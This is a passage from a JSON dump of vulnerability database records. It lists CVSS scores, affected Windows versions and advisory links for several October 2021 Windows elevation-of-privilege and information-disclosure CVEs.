"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26441", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41345"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-26441", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26441", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:45:54", "description": "Storage Spaces Controller Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-26441, CVE-2021-40478, CVE-2021-40488, CVE-2021-41345. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Storage Spaces Controller Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26441", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41345"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-40489", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40489", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:45:54", "description": "Storage Spaces Controller Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-26441, CVE-2021-40478, CVE-2021-40489, CVE-2021-41345. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Storage Spaces Controller Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26441", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41345"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-40488", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40488", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:46:12", "description": "Storage Spaces Controller Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-26441, CVE-2021-40488, CVE-2021-40489, CVE-2021-41345. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Storage Spaces Controller Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26441", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41345"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-40478", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40478", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:45:47", "description": "Storage Spaces Controller Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-26441, CVE-2021-40478, CVE-2021-40488, CVE-2021-40489. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Storage Spaces Controller Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26441", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41345"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-41345", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41345", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-05-23T19:14:24", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40466, CVE-2021-40467.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-40443", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40443", "CVE-2021-40466", "CVE-2021-40467"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2021-40443", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40443", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*"]}, {"lastseen": "2022-03-23T19:09:08", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40443, CVE-2021-40466.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-40467", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40443", "CVE-2021-40466", "CVE-2021-40467"], "modified": "2021-10-19T14:11:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2022:-"], "id": "CVE-2021-40467", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40467", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:09:07", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40443, CVE-2021-40467.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-40466", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40443", "CVE-2021-40466", "CVE-2021-40467"], "modified": "2021-10-19T14:04:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2022:-"], "id": "CVE-2021-40466", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40466", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2022-05-23T19:14:26", "description": "Windows Fast FAT File System Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-41343.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-38662", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38662", "CVE-2021-41343"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2022:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2021-38662", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38662", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*"]}, {"lastseen": "2022-03-23T19:16:54", "description": "Windows Fast FAT File System Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-38662.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-41343", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38662", "CVE-2021-41343"], "modified": "2021-10-19T17:23:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2022:-"], "id": "CVE-2021-41343", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41343", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", 